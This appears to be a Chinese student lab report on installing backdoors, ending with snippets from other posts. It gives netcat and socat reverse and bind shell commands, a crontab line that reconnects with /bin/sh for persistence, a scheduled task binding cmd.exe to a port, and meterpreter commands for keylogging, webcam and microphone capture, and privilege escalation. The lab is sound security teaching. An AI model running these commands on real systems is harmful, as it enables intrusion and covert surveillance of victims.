20155301實驗二 後門原理與實踐

2022-05-07 07:18:10 字數 3035 閱讀 9543

(1)例舉你能想到的乙個後門進入到你系統中的可能方式?

答:通過開機自動執行指令碼或者和程式繫結的方式執行。

(3)meterpreter有哪些給你映像深刻的功能

答:抓取螢幕,開啟攝像機和錄影,感覺很恐怖。

(4)如何發現自己有系統有沒有被安裝後門

答:通過任務管理器檢視有沒有陌生的程式在執行,或者利用防毒軟體查殺。

(1)使用netcat獲取主機操作shell,cron啟動

(2)使用socat獲取主機操作shell, 任務計畫啟動

(3)使用msf meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell

(4)使用msf meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

1.在windows中需要載ncat.rar,解壓後即可使用

2.利用命令列進入剛剛解壓ncat的目錄。

3.利用ncat.exe -l -p 8888命令開啟埠號為8888的埠

4.利用nc 192.168.229.129 5301 -e /bin/sh在linux**連線windows。

1.linux獲得windows shell的過程同理,在linux執行監聽指令:nc -l -p 7777開啟埠

2.利用ncat.exe -e cmd.exe 192.229.229.130指令windows**連線linux

2.使用crontab -e命令編輯配置檔案,在最後一行或第一行新增指令04 * * * * /bin/netcat 192.168.229.130 5301 -e /bin/sh

1.在windows中,右鍵單擊計算機,開啟管理->系統工具->任務計畫程式,單擊建立基本任務,填寫任務名稱,設定觸發器為當前使用者登入時,設定操作為啟動程式,選擇啟動程式為socat.exe,引數設定為tcp-listen:5301 exec:cmd.exe,pty,stderr

這步操作的作用是把cmd繫結到埠5212,同時把cmd的stderr復位向到stdout

2.登出當前使用者,並重新登入,之前建立的程式和設定的引數會自動填入執行

1.在kali中利用如下命令建立乙個名為5301的後門程式

2.將其通過ncat,傳送到主機,在windows中使用命令ncat.exe -l 5301 > 20155301.exe,在kali中使用命令:nc 192.168.229.130 5301 < 20155301.exe,這樣就傳送過來了。

3.msf開啟監聽,輸入如下指令

4.在win7開啟生成5301.exe的程式,回到kali,終端提示

5.嘗試使用命令dir,成功顯示windows中的資料夾

命令用途

keyscan_start

啟動鍵盤記錄

keyscan_dump

鍵盤記錄軟體的內容轉儲

keyscan_stop

停止鍵盤記錄軟體

record_mic

使用預設麥克風錄音

webcam_snap

拍照webcam_stream

錄影getsystem

提權獲取主機音訊

獲取擊鍵記錄

20155301滕樹晨資訊保安技術實驗二 口令破解

1.了解windows口令破解原理 2.對資訊保安有直觀感性認識 3.能夠運用工具實現口令破解 1.一人 1.windows 1.lc5 2.superdic 1.使用工具實現口令破解 2.口令破解主要有兩種方法 字典破解和暴力破解 3.字典破解是指通過破解者對管理員的了解,猜測其可能使用某些資訊作...

Exp2 後門原理與實踐

1.在win10的cmd裡,進入d ncat ncat,輸入ncat l e cmd.exe p 53 2.在kali的終端裡,輸入nc 172.16.2.29 53連線win10,獲得shell許可權 1.在win10靶機中點選控制面板 系統和安全 管理工具 任務計畫程式,話不多說,上圖。在操作選...

編譯原理實驗二(1) 前期準備

注 課程 編譯技術 上機 此處完成 實驗前期準備 簡單說兩句 因為編譯原理實驗的分數跟計組比起來少太多了,所以經過仔細考慮,我最終還是決定將時間投入複習中,實驗二只搞出乙個最基礎的東西來就好。之後如果想要補充些東西的話,再說吧.前期準備 已經將整個資料夾都備好份,以供魔改後的回溯 開始實驗 第一步修...